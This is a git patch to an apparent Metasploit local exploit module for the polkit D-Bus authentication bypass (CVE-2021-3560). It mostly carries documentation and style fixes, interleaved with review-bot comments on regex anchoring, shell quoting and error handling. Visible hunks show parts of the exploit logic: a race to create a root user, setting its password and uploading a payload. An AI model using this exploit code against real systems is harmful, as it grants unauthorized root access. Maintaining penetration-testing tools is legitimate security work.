From 9a07039e7e66fb8054642efde15e523cab1dfd5e Mon Sep 17 00:00:00 2001 From: Jack Heysel Date: Mon, 28 Jun 2021 14:02:51 -0400 Subject: [PATCH] Updated docs --- .../linux/local/polkit_dbus_auth_bypass.md | 8 +++---- .../linux/local/polkit_dbus_auth_bypass.rb | 24 +++++++++---------- 2 files changed, 16 insertions(+), 16 deletions(-) diff --git a/documentation/modules/exploit/linux/local/polkit_dbus_auth_bypass.md b/documentation/modules/exploit/linux/local/polkit_dbus_auth_bypass.md index f1f90f6f5a..b295bfcd7f 100644 --- a/documentation/modules/exploit/linux/local/polkit_dbus_auth_bypass.md +++ b/documentation/modules/exploit/linux/local/polkit_dbus_auth_bypass.md @@ -1,6 +1,6 @@ ## Description -This module exploits a authentication bypass in Linux machines that make use of the polkit is a system service. +This module exploits a authentication bypass in Linux machines that make use of the polkit system service. The vulnerability enables an unprivileged local user to get a root shell on the system. ## Vulnerable Application @@ -27,15 +27,15 @@ Download and install Ubuntu 20.04 from the Ubuntu Downloads page: https://ubuntu **SESSION** The session to run this module on. -**WRITABLE_DIR** -Directory to write file to (`%TEMP%` by default). - **USERNAME** The name of the user the exploit will add to the system **PASSWORD** The password for the user to be created +**WritableDir** +Directory to write file to (`%TEMP%` by default). + ## Scenarios ### Tested on Ubuntu 20.04 diff --git a/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb b/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb index f22d07b135..1e165465d6 100644 --- a/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb +++ b/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb 
@@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Local 'References' => [ ['URL', 'https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/'], ['CVE', '2021-3560'], - ['EDB', '50011'], + ['EDB', '50011'] ], 'Targets' => [ @@ -60,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Local register_options([ OptString.new('USERNAME', [ true, 'A username to add as root', 'msf' ], regex: /^[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\$)$/), OptString.new('PASSWORD', [ true, 'A password to add for the user (default: random)', rand_text_alphanumeric(8)]), - OptString.new('ITERATIONS', [ true, 'Due to the race condition the command might have to be run multiple times before it is successful. Use this to define how many times each command is attempted', 20]) + OptInt.new('ITERATIONS', [ true, 'Due to the race condition the command might have to be run multiple times before it is successful. Use this to define how many times each command is attempted', 20]) ]) register_advanced_options([ OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) @@ -145,7 +145,7 @@ class MetasploitModule < Msf::Exploit::Local if exploit_set_realname(rand_text_alphanumeric(12)) status = CheckCode::Vulnerable('The polkit framework instance is vulnerable.') unless exploit_set_realname(old_realname) - print_error('Failed to restore the root user\'s orignal \'RealName\' property value') + print_error('Failed to restore the root user\'s original \'RealName\' property value') end end end @@ -227,9 +227,9 @@ class MetasploitModule < Msf::Exploit::Local cmd_args << object_path cmd_args << interface_member args.each do |arg| - if arg.is_a? Integer + if arg.is_a?(Integer) cmd_args << "int32:#{arg}" - elsif arg.is_a? String + elsif arg.is_a?(String) cmd_args << "string:'#{arg}'" end end 
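Review bot: In the `@@ -60,7 +60,7 @@` hunk, the `USERNAME` validation regex on the context line above the changed `ITERATIONS` option is anchored with `^` and `$`, which in Ruby match at line boundaries rather than at the ends of the string, so a multi-line value passes as long as one of its lines matches. The same option value is interpolated unquoted into `cmd_exec("id -u #{datastore['USERNAME']}")` in the `@@ -351,7 +351,7 @@` hunk, so within the visible code this regex is the only constraint on what reaches the shell. Anchoring with `\A` and `\z` makes the check cover the whole value: `regex: /\A[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\$)\z/`. Separately, the new `OptInt` puts no lower bound on `ITERATIONS`; whether zero or a negative count is handled is decided outside this hunk.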
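Review bot: The `String` branch in the `@@ -227,9 +227,9 @@` hunk builds `"string:'#{arg}'"` by wrapping the value in single quotes without escaping it, so an argument that itself contains `'` ends the quoted region early. The rest of the method is outside the hunk, so it is only inferred that `cmd_args` is later joined into a shell command line; if it is, `cmd_args << Shellwords.escape("string:#{arg}")` keeps the whole value as one word, provided `shellwords` is loaded in this file. Arguments that are neither `Integer` nor `String` are dropped silently by the `if`/`elsif`; an `else raise ArgumentError, "unsupported D-Bus argument type: #{arg.class}"` would surface a caller mistake instead of sending a shorter argument list.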
@@ -320,15 +320,15 @@ class MetasploitModule < Msf::Exploit::Local end def upload(path, data) - print_status "Writing '#{path}' (#{data.size} bytes) ..." - rm_f path - write_file path, data - register_file_for_cleanup path + print_status("Writing '#{path}' (#{data.size} bytes) ...") + rm_f(path) + write_file(path, data) + register_file_for_cleanup(path) end def upload_and_chmodx(path, data) - upload path, data - chmod path + upload(path, data) + chmod(path) end def upload_payload @@ -351,7 +351,7 @@ class MetasploitModule < Msf::Exploit::Local if exploit_set_username(loop_sequence) uid = cmd_exec("id -u #{datastore['USERNAME']}") print_good("User #{datastore['USERNAME']} created with UID #{uid}") - print_status("Attempting to set the password of the newly create user, #{datastore['USERNAME']}, to: #{datastore['PASSWORD']}") + print_status("Attempting to set the password of the newly created user, #{datastore['USERNAME']}, to: #{datastore['PASSWORD']}") if exploit_set_password(uid, create_unix_crypt_hash, loop_sequence) print_good('Obtained code execution has root!') fname = upload_payload
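Review bot: `upload` in the `@@ -320,15 +320,15 @@` hunk discards the result of `write_file(path, data)`, so a failed write still registers the path for cleanup and lets `upload_and_chmodx` go on to `chmod` a file that may not exist. If `write_file` reports failure through its return value (my understanding of the framework's file mixin, worth confirming), the method can stop there with `fail_with(Failure::NoAccess, "Could not write #{path}") unless write_file(path, data)`. Neither method has a comment. A one-line comment on `upload` saying that it replaces any existing file at `path` and schedules it for removal would explain the `rm_f` and `register_file_for_cleanup` calls.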
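Review bot: In the `@@ -351,7 +351,7 @@` hunk, `uid` is taken straight from the output of `cmd_exec("id -u ...")` and passed to `exploit_set_password(uid, ...)` with no check that it is a number, so an error message or empty output from `id` would be reported as the new UID and carried forward. A guard before `print_good` stops there: `fail_with(Failure::UnexpectedReply, "Could not resolve UID for #{datastore['USERNAME']}") unless uid.to_s.strip.match?(/\A\d+\z/)`. The reworded `print_status` line also writes `datastore['PASSWORD']` to the console in clear text; console output is often spooled to log files, so the message could name only the user. The enclosing method starts and ends outside the hunk.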